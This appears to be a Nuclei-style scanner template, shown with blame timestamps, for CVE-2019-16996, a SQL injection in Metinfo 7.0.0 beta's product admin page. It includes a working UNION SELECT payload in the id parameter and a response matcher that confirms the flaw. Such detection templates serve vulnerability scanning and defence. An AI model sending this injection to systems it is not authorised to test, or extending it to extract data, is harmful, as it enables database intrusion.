2022-04-16 07:22:19 +00:00
id : CVE-2019-16996
info :
2022-06-14 15:02:19 +00:00
name : Metinfo 7.0.0 beta - SQL Injection
2022-04-16 07:22:19 +00:00
author : ritikchaddha
severity : high
2022-06-14 15:02:19 +00:00
description : Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability.
2022-04-16 07:22:19 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1
2022-06-14 15:02:19 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-16996
2022-04-22 14:30:15 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 7.2
2022-04-22 14:30:15 +00:00
cve-id : CVE-2019-16996
cwe-id : CWE-89
2023-07-11 19:49:27 +00:00
epss-score : 0.30632
2023-08-31 11:46:18 +00:00
epss-percentile : 0.96378
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : metinfo
product : metinfo
tags : metinfo,sqli,cve,cve2019
2022-04-16 07:22:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-16 07:22:19 +00:00
- method : GET
path :
- "{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-04-16 07:22:19 +00:00
max-redirects : 2
2023-07-11 19:49:27 +00:00
2022-04-16 07:22:19 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- "1918835981"
- type : status
status :
- 200